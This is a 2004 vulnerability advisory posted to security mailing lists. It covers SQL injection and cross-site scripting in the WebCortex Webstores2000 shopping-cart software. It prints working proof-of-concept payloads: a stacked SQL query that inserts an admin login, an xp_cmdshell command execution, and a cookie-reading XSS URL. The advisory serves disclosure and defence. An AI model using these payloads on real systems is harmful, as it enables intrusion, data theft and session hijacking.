WebCortex Webstores2000 version 6.0 multiple security vulnerabilities

From: Nick Gudov (cipher_at_s-quadra.com)
Date: 02/18/04

  • Next message: Tim Yamin: "[ GLSA 200402-07 ] Clamav 0.65 DoS vulnerability"
    Date: Wed, 18 Feb 2004 16:49:10 +0300
    To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com>
    
    

              S-Quadra Advisory #2004-02-18

    Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
    Severity: High
    Vendor URL: http://www.webcortex.com
    Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt
    Release date: 18 Feb 2004

     1. DESCRIPTION

     Webstores2000 is a complete solution for building shopping carts and
    shopping malls
    for e-commerce enabled sites. Its written on ASP, works on most Windows
    platforms
    and uses MS Access or MS SQL Server as a backend.
    Please visit http://www.webcortex.com for information about Webstores2000.

     2. DETAILS

      -- Vulnerability 1: SQL Injection vulnerability

     An SQL Injection vulnerability has been found in the 'browse_items.asp'
    script

     User supplied input is not filtered before being used in a SQL query.
    Consequently,
    query modification using malformed input is possible.

     Successfull exploitation of this vulnerability could allow an attacker
    to gain
    administrative access to shopping mall and read any information from
    database (i.e. customers private data). Also an attacker could execute
    arbitrary
    commands using xp_cmdshell function.

      -- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'

     By injecting specially crafted javascript code in url and tricking a
    user to visit
    it a remote attacker can steal user session id and gain access to user's
    personal data.

     --PoC code

      --Vulnerability 1:

     Platform: MS SQL Server as a backend

     Posting this data to browse_items.asp creates new administrative account
     
    Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0

     Posting this data to browse_items.asp executes 'dir c:' command
     
    Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4

      -- Vulnerability 2:

     http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>
     
     3. FIX INFORMATION
     S-Quadra alerted WebCortex development team to this issue on 13th
    February 2004.
    The following response from Shay Sabah has been received:
    "OK... All of these have been fixed...
    Now, I ask you to please STOP using our software and making all these
    "security" emails..."
     
     4. CREDITS

     Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.

     5. ABOUT

     S-Quadra offers services in computer security, penetration testing and
    network assesment,
    web application security, source code review and third party product
    vulnerability assesment,
    forensic support and reverse engineering.

               S-Quadra Advisory #2004-02-18


  • Next message: Tim Yamin: "[ GLSA 200402-07 ] Clamav 0.65 DoS vulnerability"

    Relevant Pages

    • [NT] Cumulative Patch for SQL Server
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... released patches for SQL Server 2000. ... * A buffer overrun vulnerability in a procedure used to encrypt SQL ... An attacker who was able to successfully ...
      (Securiteam)
    • [NT] Vulnerabilities in Microsoft SQL Server Allows Elevation of Privilege (MS08-040)
      ... Get your security news from a reliable source. ... Vulnerabilities in Microsoft SQL Server Allows Elevation of Privilege ... The more serious of the vulnerabilities could allow an attacker to run ... An information disclosure vulnerability exists in the way that SQL Server ...
      (Securiteam)
    • [NT] SQL Server Remote Data Source Function Buffer Overflows
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... One of the features of Structured Query Language in SQL Server 7.0 ... An attacker could exploit this vulnerability in one of two ways. ...
      (Securiteam)
    • [NT] Another Cumulative Patch for SQL Server Released
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... previously released patches for SQL Server 7.0, SQL Server 2000, and ... malformed login request to an affected server, an attacker could either ... * A buffer overrun vulnerability that occurs in one of the Database ...
      (Securiteam)
    • WebCortex Webstores2000 version 6.0 multiple security vulnerabilities
      ... WebCortex Webstores2000 version 6.0 multiple security vulnerabilities ... and uses MS Access or MS SQL Server as a backend. ... An SQL Injection vulnerability has been found in the 'browse_items.asp' ...
      (Bugtraq)